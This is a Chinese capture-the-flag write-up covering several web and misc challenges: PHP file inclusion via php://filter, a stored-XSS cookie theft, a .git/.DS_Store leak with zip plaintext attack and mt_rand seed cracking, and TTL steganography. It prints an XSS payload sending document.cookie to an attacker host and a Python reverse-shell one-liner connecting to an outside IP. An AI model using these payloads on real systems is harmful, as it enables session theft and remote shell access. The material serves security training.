<h2>Web</h2> <h3>babyt3</h3> 登录看到: <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabea8ac03d9.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabea8ac03d9.png" alt="" style=""></a></span> 尝试文件包含: <pre><code class="bash">file=php://filter/read=convert.base64-encode/resource=index.php </code></pre> 得到源码: <pre><code class="php"><?php $a = @$_GET['file']; if (!$a) { $a = './templates/index.html'; } echo 'include $_GET[\'file\']'; if (strpos('flag',$a)!==false) { die('nonono'); } include $a; ?> <!--hint: dir.php --> </code></pre> 读取<code>dir.php</code>的源码: <pre><code class="bash">file=php://filter/read=convert.base64-encode/resource=dir.php </code></pre> 得到源码: <pre><code class="php"><?php $a = @$_GET['dir']; if(!$a){ $a = '/tmp'; } var_dump(scandir($a)); </code></pre> 构造去查看根目录下: <pre><code class="bash">dir.php?dir=/ </code></pre> <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabec3dc077e.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabec3dc077e.png" alt="" style=""></a></span> 然后去读取<code>ffffflag_1s_Her4</code>文件: <pre><code class="bash">/?file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4 </code></pre> 得到<code>flag</code>。 <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabec7e53960.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabec7e53960.png" alt="" style=""></a></span> <h3>Breakout</h3> 进去看到留言板 <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabeca7a41e8.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabeca7a41e8.png" alt="" style=""></a></span> 使用下面<code>payload</code>可以弹到自己的<code>cookie</code>: <pre><code class="language-javascript ">javascript:window.location.href='http://xxxx:8000/?a='+document.cookie </code></pre> 然后去<code>report</code>页面提交留言板地址:<code>http://ctf1.linkedbyx.com:10441/main.php</code> <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabed0de3201.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabed0de3201.png" alt="" style=""></a></span> 过验证码的脚本: <pre><code class="python">import hashlib def md5(key): m = hashlib.md5() m.update(key.encode('utf-8')) return m.hexdigest() for i in range(1000000000): if md5(str(i))[0:6] == '7751c4': print(i) break </code></pre> 然后自己远程服务器上: <pre><code class="bash">$ nc -lvvp 8000 </code></pre> 可以打到管理员的<code>cookie</code>: <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabed435c733.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabed435c733.png" alt="" style=""></a></span> 然后去执行命令。 <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabed715399c.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabed715399c.png" alt="" style=""></a></span> 远程<code>getshell</code>。<code>payload</code>如下: <pre><code class="bash">command=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("118.25.89.91",8000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'&exec=1 </code></pre> <span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabedb70e626.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabedb70e626.png" alt="" style=""></a></span> 反弹<code>shell</code>成功后,<code>flag.txt</code>在根目录下。<span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabedefe1bb5.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabedefe1bb5.png" alt="" style=""></a></span> <h3>猜猜flag是什么</h3> 首先要去拿到<code>code</code>。<span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabee0e06a76.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabee0e06a76.png" alt="" style=""></a></span> 通过扫描,可以看到根目录下有<code>.DS_Store</code>泄露:<code>http://ctf1.linkedbyx.com:10442/.DS_Store</code>。<span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabee7574913.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabee7574913.png" alt="" style=""></a></span> 找到<code>/e10adc3949ba59abbe56e057f20f883e/</code>目录后访问,可以看到又有<code>.git</code>泄露。<span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabee95b9fd6.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabee95b9fd6.png" alt="" style=""></a></span> 用<code>githack</code>获得一个压缩包<code>BackupForMySite.zip</code>。 用明文攻击解开压缩包,得到里面的<code>code</code>。<span class="external-link"><a class="no-external-link" href="https://i.loli.net/2019/04/09/5cabeebf591e4.png" target="_blank"><i data-feather="external-link"></i><img src="https://i.loli.net/2019/04/09/5cabeebf591e4.png" alt="" style=""></a></span> 之后去主页面提交: <pre><code class="bash">/?code=你找到的code </code></pre> 给了一个随机数。 使用<code>php_mt_seed</code>: <pre><code class="bash">$ time ./php_mt_seed 你的随机数 </code></pre> 得到数字依次访问: <pre><code class="bash">/flag/得到的数字.txt </code></pre> 就能得到<code>flag</code>。 <h2>Misc</h2> <h3>奇怪的TTL字段</h3> 发现ttl.txt中的ttl只有4个值63,127,191,255,写出他们的二进制表示后发现只有最高两位不同 于是考虑做如下转换,发现写出来的16进制数开头是ffd8,应该是jpg,于是写入文件中: <pre><code class="python">fp = open('ttl.txt','r') a = fp.readlines() p = [] for i in a: p.append(int(i[4:])) s = '' for i in p: if i == 63: a = '00' elif i == 127: a = '01' elif i == 191: a = '10' elif i == 255: a = '11' s += a # print(s) import binascii flag = '' for i in range(0,len(s),8): flag += chr(int(s[i:i+8],2)) flag = binascii.unhexlify(flag) wp = open('res.jpg','wb') wp.write(flag) wp.close() #00111111 63 #01111111 127 #10111111 191 #11111111 255 </code></pre> 写完之后发现只有二维码的一部分,应该是不止一张图,用foremost直接分开就好了,之后用ps拼在一块,扫描之后得到如下信息: <pre><code class="bash">key:AutomaticKey cipher:fftu{2028mb39927wn1f96o6e12z03j58002p} </code></pre> 应该就是AutoKey那个加密了,找了个在线网站解密 <a href="https://www.wishingstarmoye.com/ctf/autokey" title="https://www.wishingstarmoye.com/ctf/autokey">https://www.wishingstarmoye.com/ctf/autokey</a> 得到flag。 转载自 <a href="https://www.jianshu.com/p/13025b096f23" title="https://www.jianshu.com/p/13025b096f23">https://www.jianshu.com/p/13025b096f23</a> 已获得作者(Eumenides_62ac)授权转载 最后修改:2021 年 03 月 11 日 © 允许规范转载 赞 0 如果觉得我的文章对你有用,请随意赞赏